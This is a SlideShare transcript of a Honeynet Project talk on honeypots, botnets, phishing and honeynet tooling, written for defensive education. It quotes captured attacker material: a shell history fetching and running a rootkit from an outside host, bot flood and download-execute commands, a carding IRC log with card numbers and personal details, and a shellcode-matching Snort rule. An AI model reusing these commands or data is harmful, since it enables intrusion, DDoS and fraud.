Honeypot Project

4,433 views

Published on

Published in: Technology, Business
3 Comments
2 Likes
Statistics
Notes
  • plese send ppt of honeypot to me at
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Please send me this ppt on sarishti_kapoor@yahoo.com.I would be grateful to you. :)
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • how to download this ppt...........plz help its urgent
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
4,433
On SlideShare
0
From Embeds
0
Number of Embeds
170
Actions
Shares
0
Downloads
0
Comments
3
Likes
2
Embeds 0
No embeds

No notes for slide
  • Honeypot Project

    1. 1. Honeynets and The Honeynet Project
    2. 2. Speaker
    3. 3. Purpose <ul><li>To explain our organization, our value to you, and our research. </li></ul>
    4. 4. Agenda <ul><li>The Honeynet Project and Research Alliance </li></ul><ul><li>The Threat </li></ul><ul><li>How Honeynets Work </li></ul><ul><li>Learning More </li></ul>
    5. 5. Honeynet Project
    6. 6. Problem <ul><li>How can we defend against an enemy, when we don’t even know who the enemy is? </li></ul>
    7. 7. Mission Statement <ul><li>To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned. </li></ul>
    8. 8. Our Goal <ul><li>Improve security of Internet at no cost to the public. </li></ul><ul><ul><li>Awareness: Raise awareness of the threats that exist. </li></ul></ul><ul><ul><li>Information: For those already aware, we teach and inform about the threats. </li></ul></ul><ul><ul><li>Research: We give organizations the capabilities to learn more on their own. </li></ul></ul>
    9. 9. Honeynet Project <ul><li>Non-profit (501c3) organization with Board of Directors. </li></ul><ul><li>Funded by sponsors </li></ul><ul><li>Global set of diverse skills and experiences. </li></ul><ul><li>Open Source, share all of our research and findings at no cost to the public. </li></ul><ul><li>Deploy networks around the world to be hacked. </li></ul><ul><li>Everything we capture is happening in the wild. </li></ul><ul><li>We have nothing to sell. </li></ul>
    10. 10. Honeynet Research Alliance <ul><li>Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies. </li></ul><ul><li>http://www.honeynet.org/alliance/ </li></ul>
    11. 11. Alliance Members <ul><li>South Florida Honeynet Project </li></ul><ul><li>Georgia Technical Institute </li></ul><ul><li>Azusa Pacific University </li></ul><ul><li>USMA Honeynet Project </li></ul><ul><li>Pakistan Honeynet Project </li></ul><ul><li>Paladion Networks Honeynet Project (India) </li></ul><ul><li>Internet Systematics Lab Honeynet Project (Greece) </li></ul><ul><li>Honeynet.BR (Brazil) </li></ul><ul><li>UK Honeynet </li></ul><ul><li>French Honeynet Project </li></ul><ul><li>Italian Honeynet Project </li></ul><ul><li>Portugal Honeynet Project </li></ul><ul><li>German Honeynet Project </li></ul><ul><li>Spanish Honeynet Project </li></ul><ul><li>Singapore Honeynet Project </li></ul><ul><li>China Honeynet Project </li></ul>
    12. 12. The Threat
    13. 13. What we have captured <ul><li>The Honeynet Project has captured primarily external threats that focus on targets of opportunity. </li></ul><ul><li>Little has yet to be captured on advanced threats, few honeynets to date have been designed to capture them. </li></ul>
    14. 14. The Threat <ul><li>Hundreds of scans a day. </li></ul><ul><li>Fastest time honeypot manually compromised, 15 minutes (worm, under 60 seconds). </li></ul><ul><li>Life expectancies: vulnerable Win32 system is under three hours, vulnerable Linux system is three months. </li></ul><ul><li>Primarily cyber-crime, focus on Win32 systems and their users. </li></ul><ul><li>Attackers can control thousands of systems (Botnets). </li></ul>
    15. 15. The Threat
    16. 16. The Motive <ul><li>Motives vary, but we are seeing more and more criminally motivated. </li></ul><ul><li>Several years ago, hackers hacked computers. Now, criminals hack computers. </li></ul><ul><li>Fraud, extortion and identity theft have been around for centuries, the net just makes it easier. </li></ul>
    17. 17. DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: &quot;give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
    18. 18. The Target <ul><li>The mass users. </li></ul><ul><li>Tend to be non-security aware, making them easy targets. </li></ul><ul><li>Economies of scale (it’s a global target). </li></ul>
    19. 19. Interesting Trends <ul><li>Attacks often originate from economically depressed countries (Romania is an example). </li></ul><ul><li>Attacks shifting from the computer to the user (computers getting harder to hack). </li></ul><ul><li>Attackers continue to get more sophisticated. </li></ul>
    20. 20. The Tools <ul><li>Attacks used to be primarily worms and autorooters. </li></ul><ul><li>New advances include Botnets and Phishing. </li></ul><ul><li>Tools are constantly advancing. </li></ul>
    21. 21. The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
    22. 22. Botnets <ul><li>Large networks of hacked systems. </li></ul><ul><li>Often thousands, if not tens of thousands, of hacked systems under the control of a single user. </li></ul><ul><li>Automated commands used to control the ‘zombies’. </li></ul>
    23. 23. How They Work <ul><li>After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host. </li></ul><ul><li>The binary is started, and connects to the hard-coded master IRC server. </li></ul><ul><li>Often a dynamic DNS name is provided rather than a hard coded IP address, so the bot can be easily relocated. </li></ul><ul><li>Using a special crafted nickname like USA|743634 the bot joins the master's channel, sometimes using a password to keep strangers out of the channel </li></ul>
    24. 24. 80% of traffic <ul><li>Port 445/TCP </li></ul><ul><li>Port 139/TCP </li></ul><ul><li>Port 135/TCP </li></ul><ul><li>Port 137/UDP </li></ul><ul><li>Infected systems most often WinXP-SP1 and Win2000 </li></ul>
    25. 25. Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
    26. 26. Numbers <ul><li>Over a 4 months period </li></ul><ul><ul><li>More then 100 Botnets were tracked </li></ul></ul><ul><ul><li>One channel had over 200,000 IP addresses. </li></ul></ul><ul><ul><li>One computer was compromised by 16 Bots. </li></ul></ul><ul><ul><li>Estimate over 1 millions systems compromised. </li></ul></ul>
    27. 27. Botnet Economy <ul><li>Botnets sold or for rent. </li></ul><ul><li>Saw Botnets being stolen from each other. </li></ul><ul><li>Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information. </li></ul>
    28. 28. Phishing <ul><li>Social engineer victims to give up valuable information (login, password, credit card number, etc). </li></ul><ul><li>Easier to hack the user then the computers. </li></ul><ul><li>Need attacks against instant messaging. </li></ul><ul><li>http://www.antiphishing.org </li></ul>
    29. 29. The Sting
    30. 30. Getting the Info
    31. 31. Infrastructure <ul><li>Attackers build network of thousands of hacked systems (often botnets). </li></ul><ul><li>Upload pre-made pkgs for Phishing. </li></ul><ul><li>Use platforms for sending out spoofed email. </li></ul><ul><li>Use platforms for false websites. </li></ul>
    32. 32. A Phishing Rootkit <ul><li>-rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only </li></ul><ul><li>-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip </li></ul><ul><li>-rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip </li></ul><ul><li>-rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html </li></ul><ul><li>-rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip </li></ul><ul><li>-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip </li></ul><ul><li>-rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php </li></ul><ul><li>-rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip </li></ul><ul><li>-rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz </li></ul><ul><li>-rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip </li></ul><ul><li>-rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip </li></ul><ul><li>-rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz </li></ul><ul><li>drwxr-xr-x 2 free web 49 Jul 16 12:26 banka </li></ul><ul><li>-rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz </li></ul><ul><li>-rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip </li></ul>
    33. 33. Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
    34. 34. The Future <ul><li>Hacking is profitable and difficult to get caught. </li></ul><ul><li>Expect more attacks to focus on the end user or the client. </li></ul><ul><li>Expect things to get worse, bad guys adapt faster. </li></ul>
    35. 35. Honeynets
    36. 36. Honeypots <ul><li>A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. </li></ul><ul><li>Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise. </li></ul><ul><li>Primary value to most organizations is information. </li></ul>
    37. 37. Advantages <ul><li>Collect small data sets of high value. </li></ul><ul><li>Reduce false positives </li></ul><ul><li>Catch new attacks, false negatives </li></ul><ul><li>Work in encrypted or IPv6 environments </li></ul><ul><li>Simple concept requiring minimal resources. </li></ul>
    38. 38. Disadvantages <ul><li>Limited field of view (microscope) </li></ul><ul><li>Risk (mainly high-interaction honeypots) </li></ul>
    39. 39. Types <ul><li>Low-interaction </li></ul><ul><ul><li>Emulates services, applications, and OS’s. </li></ul></ul><ul><ul><li>Low risk and easy to deploy/maintain, but capture limited information. </li></ul></ul><ul><li>High-interaction </li></ul><ul><ul><li>Real services, applications, and OS’s </li></ul></ul><ul><ul><li>Capture extensive information, but high risk and time intensive to maintain. </li></ul></ul>
    40. 40. Examples of Honeypots <ul><li>BackOfficer Friendly </li></ul><ul><li>KFSensor </li></ul><ul><li>Honeyd </li></ul><ul><li>Honeynets </li></ul>Low Interaction High Interaction
    41. 41. Honeynets <ul><li>High-interaction honeypot designed to capture in-depth information . </li></ul><ul><li>Information has different value to different organizations. </li></ul><ul><li>Its an architecture you populate with live systems, not a product or software. </li></ul><ul><li>Any traffic entering or leaving is suspect. </li></ul>
    42. 42. How it works <ul><li>A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed. </li></ul><ul><ul><li>Data Control </li></ul></ul><ul><ul><li>Data Capture </li></ul></ul><ul><ul><li>Data Analysis </li></ul></ul>http://www.honeynet.org/papers/honeynet/
    43. 43. Honeynet Architecture
    44. 44. Data Control <ul><li>Mitigate risk of honeynet being used to harm non-honeynet systems. </li></ul><ul><li>Count outbound connections. </li></ul><ul><li>IPS (Snort-Inline) </li></ul><ul><li>Bandwidth Throttling* </li></ul>
    45. 45. No Data Control
    46. 46. Data Control
    47. 47. Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; replace: &quot;| 0000 E8D7 FFFFFF|/ ben/sh &quot;;)
    48. 48. Data Capture <ul><li>Capture all activity at a variety of levels. </li></ul><ul><li>Network activity. </li></ul><ul><li>Application activity. </li></ul><ul><li>System activity. </li></ul>
    49. 49. Sebek <ul><li>Hidden kernel module that captures all host activity </li></ul><ul><li>Dumps activity to the network. </li></ul><ul><li>Attacker cannot sniff any traffic based on magic number and dst port. </li></ul>
    50. 50. Sebek Architecture
    51. 51. Honeywall CDROM <ul><li>Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM. </li></ul><ul><li>May, 2003 - Released Eeyore </li></ul><ul><li>May, 2005 - Released Roo </li></ul>
    52. 52. Eeyore Problems <ul><li>OS too minimized, almost crippled. Could not easily add functionality. </li></ul><ul><li>Difficult to modify since LiveCD. </li></ul><ul><li>Limited distributed capabilities </li></ul><ul><li>No GUI administration </li></ul><ul><li>No Data Analysis </li></ul><ul><li>No international or SCSI support </li></ul>
    53. 53. Roo Honeywall CDROM <ul><li>Based on Fedora Core 3 </li></ul><ul><li>Vastly improved hardware and international support. </li></ul><ul><li>Automated, headless installation </li></ul><ul><li>New Walleye interface for web based administration and data analysis. </li></ul><ul><li>Automated system updating. </li></ul>
    54. 54. Installation <ul><li>Just insert CDROM and boot, it installs to local hard drive. </li></ul><ul><li>After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards. </li></ul><ul><li>Following installation, you get a command prompt and system is ready to configure. </li></ul>
    55. 55. First Boot
    56. 56. Install
    57. 57. Configure
    58. 58. 3 Methods to Maintain <ul><li>Command Line Interface </li></ul><ul><li>Dialog Interface </li></ul><ul><li>Web GUI ( Walleye ) </li></ul>
    59. 59. Command Line Interface <ul><li>Local or SSH access only. </li></ul><ul><li>Use the utility hwctl to modify configurations and restart services. </li></ul><ul><li># hwctl HwTCPRATE=30 </li></ul>
    60. 60. Dialog Menu
    61. 61. Data Administration
    62. 62. Data Analysis <ul><li>Most critical part, the purpose of a honeynet is to gather information and learn. </li></ul><ul><li>Need a method to analyze all the different elements of information. </li></ul><ul><li>Walleye is the new solution, comes with the CDROM. </li></ul>
    63. 63. Walleye
    64. 64. Data Analysis
    65. 65. Data Analysis Flows
    66. 66. Data Analysis Details
    67. 67. Processes
    68. 68. Files
    69. 69. Distributed Capabilities
    70. 70. Issues <ul><li>Require extensive resources to properly maintain. </li></ul><ul><li>Detection and anti-honeynet technologies have been introduced. </li></ul><ul><li>Can be used to attack or harm other non-Honeynet systems. </li></ul><ul><li>Privacy can be a potential issue. </li></ul>
    71. 71. Legal Contact for .mil / .gov <ul><li>Department of Justice; Computer Crime and Intellectual Property Section. </li></ul><ul><ul><li>Paul Ohm </li></ul></ul><ul><ul><ul><li>Number: (202) 514.1026 </li></ul></ul></ul><ul><ul><ul><li>E-Mail: [email_address] </li></ul></ul></ul>
    72. 72. Learning More
    73. 73. Our Website <ul><li>Know Your Enemy papers. </li></ul><ul><li>Scan of the Month Challenges </li></ul><ul><li>Latest Tools and Technologies </li></ul><ul><li>http://www.honeynet.org/ </li></ul>
    74. 74. Our Book http://www.honeynet.org/book
    75. 75. Sponsoring YOU? Advanced Network Management Lab
    76. 76. How to Sponsor <ul><li>Sponsor development of a new tool </li></ul><ul><li>Sponsor authorship of a new research paper. </li></ul><ul><li>Sponsor research and development. </li></ul><ul><li>Buy our book </li></ul><project@honeynet.org> http://www.honeynet.org/funds/
    77. 77. Conclusion <ul><li>The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats. </li></ul>
    78. 78. <ul><li>http://www.honeynet.org </li></ul><ul><ul><li><project@honeynet.org> </li></ul></ul>

    ×